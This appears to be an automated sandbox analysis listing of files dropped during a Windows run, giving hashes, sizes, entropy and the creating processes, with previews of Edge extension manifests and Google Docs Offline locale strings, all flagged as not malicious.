                                                                                                                                                                                                                                                                          SHA-256:A5DCC1663FAC120C61DAF0E65CC3EC1E368EA7A6F01B2693D090F9053E9156B5
                                                                                                                                                                                                                                                                          SHA-512:E836775D240C9BD60D50C56CC0F9E386922C1648BA6C1396BD217A59C99CE5B51FEFA768E079CD0519F186B2DECEE911CE95CA2DA8FFE5029E73ADBF1623A5A4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jan 9 12:54:16 2025, mtime=Thu Jan 9 12:54:17 2025, atime=Fri Jan 3 18:13:10 2025, length=6487736, window=hide
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):982
                                                                                                                                                                                                                                                                          Entropy (8bit):4.985362073764363
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:805Ci4mllSkCh7eY//9NzLY1Shzth9mbw3wD/6tYjA5HwWrRaUsJhhuwD/T2s2sc:8xGGXHjztLmn6yAfFcXTXBm
                                                                                                                                                                                                                                                                          MD5:720C0223C3EE9C8A6FD33A94066B1FFA
                                                                                                                                                                                                                                                                          SHA1:EF30231C45D81C3F14917C8083E6FD3936F5DDFD
                                                                                                                                                                                                                                                                          SHA-256:4B78A0C0D2552739BE478C8C093534F8A2AEBD95DE6C2A1FD0547B6340E0D747
                                                                                                                                                                                                                                                                          SHA-512:591D37B3638FEF8BEF85507A6352E4DB5AFD39ED99BD27DE826CB24B9E596A998893FA224121E5B4E3C61C9694DF046A5AC744F8CDF8681A217A3C0BD79ED333
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2526208
                                                                                                                                                                                                                                                                          Entropy (8bit):6.697179434185451
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:qMKUORaA3LORJ81Ba8+bCo4volrEPbyI0iQXAtQJXT0HcCIFZxXQNw07f7E5GGsP:u90jwASKZpgN
                                                                                                                                                                                                                                                                          MD5:E1EF99935026E1F84F065C75819BF8E8
                                                                                                                                                                                                                                                                          SHA1:1AE0CD73731E784F733D30AC2043FC0E85914EC1
                                                                                                                                                                                                                                                                          SHA-256:1634B7E132C988B7142F2DB5B0F20059DEEDCDF9F8EC16222C495D9047F3E52C
                                                                                                                                                                                                                                                                          SHA-512:5AB53D5E9C74581E7FBCF5E7291D3FB7C8844C119FD12DAC2D25C94A534ED3048C2FBB4B6B4B167B98FEDCE9B9A1B2B2D80E3E279EEA5A792FFD865FEDE616AA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2526208
                                                                                                                                                                                                                                                                          Entropy (8bit):6.697179434185451
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:qMKUORaA3LORJ81Ba8+bCo4volrEPbyI0iQXAtQJXT0HcCIFZxXQNw07f7E5GGsP:u90jwASKZpgN
                                                                                                                                                                                                                                                                          MD5:E1EF99935026E1F84F065C75819BF8E8
                                                                                                                                                                                                                                                                          SHA1:1AE0CD73731E784F733D30AC2043FC0E85914EC1
                                                                                                                                                                                                                                                                          SHA-256:1634B7E132C988B7142F2DB5B0F20059DEEDCDF9F8EC16222C495D9047F3E52C
                                                                                                                                                                                                                                                                          SHA-512:5AB53D5E9C74581E7FBCF5E7291D3FB7C8844C119FD12DAC2D25C94A534ED3048C2FBB4B6B4B167B98FEDCE9B9A1B2B2D80E3E279EEA5A792FFD865FEDE616AA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):11185
                                                                                                                                                                                                                                                                          Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                          MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                          SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                          SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                          SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1753
                                                                                                                                                                                                                                                                          Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                          MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                          SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                          SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                          SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "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",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):9815
                                                                                                                                                                                                                                                                          Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                          MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                          SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                          SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                          SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):10388
                                                                                                                                                                                                                                                                          Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                          MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                          SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                          SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                          SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):962
                                                                                                                                                                                                                                                                          Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                          MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                          SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                          SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                          SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):154477
                                                                                                                                                                                                                                                                          Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                          MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                          SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                          SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                          SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):4982
                                                                                                                                                                                                                                                                          Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                          MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                          SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                          SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                          SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):908
                                                                                                                                                                                                                                                                          Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                          MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                          SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                          SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                          SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1285
                                                                                                                                                                                                                                                                          Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                          MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                          SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                          SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                          SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1244
                                                                                                                                                                                                                                                                          Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                          MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                          SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                          SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                          SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):977
                                                                                                                                                                                                                                                                          Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                          MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                          SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                          SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                          SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3107
                                                                                                                                                                                                                                                                          Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                          MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                          SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                          SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                          SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1389
                                                                                                                                                                                                                                                                          Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                          MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                          SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                          SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                          SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1763
                                                                                                                                                                                                                                                                          Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                          MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                          SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                          SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                          SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):930
                                                                                                                                                                                                                                                                          Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                          MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                          SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                          SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                          SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):913
                                                                                                                                                                                                                                                                          Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):806
                                                                                                                                                                                                                                                                          Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):883
                                                                                                                                                                                                                                                                          Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
